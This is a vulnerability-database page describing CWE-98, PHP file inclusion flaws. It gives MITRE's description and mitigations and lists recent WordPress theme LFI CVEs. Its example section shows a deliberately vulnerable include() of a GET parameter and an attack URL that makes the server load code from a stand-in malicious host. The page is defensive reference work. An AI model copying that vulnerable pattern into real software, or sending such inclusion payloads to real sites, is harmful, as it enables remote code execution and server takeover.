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CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) — Vulnerability Class 1083

1083 vulnerabilities classified as CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)). AI Chinese analysis included.

CWE-98 represents a critical input validation weakness where PHP applications fail to properly sanitize user-supplied data before passing it to include or require functions. Attackers typically exploit this by injecting malicious URLs or local file paths, enabling Remote File Inclusion (RFI) or Local File Inclusion (LFI). This allows adversaries to execute arbitrary code hosted on external servers or access sensitive system files, often leading to full server compromise. To mitigate this risk, developers must strictly validate and whitelist allowed filenames or paths, ensuring only expected local resources are included. Additionally, disabling the allow_url_include and allow_url_fopen directives in the PHP configuration prevents the inclusion of remote files entirely. Implementing robust input validation and adhering to the principle of least privilege significantly reduces the attack surface associated with dynamic file inclusion mechanisms.

MITRE CWE Description
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Common Consequences (1)
Integrity, Confidentiality, AvailabilityExecute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the f…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
CVE IDTitleCVSSSeverityPublished
CVE-2026-22377 WordPress Saveo theme <= 1.1.2 - Local File Inclusion vulnerability — Saveo 8.1 High2026-02-20
CVE-2026-22378 WordPress Blabber theme <= 1.7.0 - Local File Inclusion vulnerability — Blabber 8.1 High2026-02-20
CVE-2026-22375 WordPress Impacto Patronus theme <= 1.2.3 - Local File Inclusion vulnerability — Impacto Patronus 8.1 High2026-02-20
CVE-2026-22376 WordPress Parkivia theme <= 1.1.9 - Local File Inclusion vulnerability — Parkivia 8.1 High2026-02-20
CVE-2026-22373 WordPress Fooddy theme <= 1.3.10 - Local File Inclusion vulnerability — Fooddy 8.1 High2026-02-20
CVE-2026-22374 WordPress Zio Alberto theme <= 1.2.2 - Local File Inclusion vulnerability — Zio Alberto 8.1 High2026-02-20
CVE-2026-22372 WordPress Isida theme <= 1.4.2 - Local File Inclusion vulnerability — Isida 8.1 High2026-02-20
CVE-2026-22370 WordPress Marveland theme <= 1.3.0 - Local File Inclusion vulnerability — Marveland 8.1 High2026-02-20
CVE-2026-22368 WordPress Redy theme <= 1.0.2 - Local File Inclusion vulnerability — Redy 8.1 High2026-02-20
CVE-2026-22371 WordPress Gustavo theme <= 1.2.2 - Local File Inclusion vulnerability — Gustavo 8.1 High2026-02-20
CVE-2026-22369 WordPress Ironfit theme <= 1.5 - Local File Inclusion vulnerability — Ironfit 8.1 High2026-02-20
CVE-2026-22367 WordPress Coworking theme <= 1.6.1 - Local File Inclusion vulnerability — Coworking 8.1 High2026-02-20
CVE-2026-22366 WordPress Jude theme <= 1.3.0 - Local File Inclusion vulnerability — Jude 8.1 High2026-02-20
CVE-2026-22365 WordPress Soleng theme <= 1.0.5 - Local File Inclusion vulnerability — Soleng 8.1 High2026-02-20
CVE-2026-22364 WordPress SevenTrees theme <=1.0.2 - Local File Inclusion vulnerability — SevenTrees 8.1 High2026-02-20
CVE-2026-22362 WordPress Photolia theme <= 1.0.3 - Local File Inclusion vulnerability — Photolia 8.1 High2026-02-20
CVE-2026-22363 WordPress Rhodos theme <= 1.3.3 - Local File Inclusion vulnerability — Rhodos 8.1 High2026-02-20
CVE-2026-22361 WordPress A-Mart theme <= 1.0.2 - Local File Inclusion vulnerability — A-Mart 8.1 High2026-02-20
CVE-2026-22356 WordPress Jetpack CRM plugin <= 6.7.0 - Local File Inclusion vulnerability — Jetpack CRM 7.5 High2026-02-20
CVE-2026-22344 WordPress FiveStar theme <= 1.7 - Local File Inclusion vulnerability — FiveStar 8.1 High2026-02-20
CVE-2025-69409 WordPress PJ | Life & Business Coaching theme <= 3.0.0 - Local File Inclusion vulnerability — PJ | Life & Business Coaching 8.1 High2026-02-20
CVE-2025-69410 WordPress Belletrist theme <= 1.2 - Local File Inclusion vulnerability — Belletrist 8.1 High2026-02-20
CVE-2025-69408 WordPress HealthFirst theme <= 1.0.1 - Local File Inclusion vulnerability — HealthFirst 8.1 High2026-02-20
CVE-2025-69407 WordPress Struktur theme <= 2.5.1 - Local File Inclusion vulnerability — Struktur 8.1 High2026-02-20
CVE-2025-69406 WordPress FreightCo theme <= 1.1.7 - Local File Inclusion vulnerability — FreightCo 8.1 High2026-02-20
CVE-2025-69402 WordPress R&F theme <= 1.5 - Local File Inclusion vulnerability — R&F 8.1 High2026-02-20
CVE-2025-69399 WordPress Cobble theme <= 1.7 - Local File Inclusion vulnerability — Cobble 8.1 High2026-02-20
CVE-2025-69398 WordPress Plank theme <= 1.7 - Local File Inclusion vulnerability — Plank 8.1 High2026-02-20
CVE-2025-69400 WordPress Yokoo theme <= 1.1.11 - Local File Inclusion vulnerability — Yokoo 8.1 High2026-02-20
CVE-2025-69397 WordPress Tint theme <= 1.7 - Local File Inclusion vulnerability — Tint 8.1 High2026-02-20

Vulnerabilities classified as CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) represent 1083 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.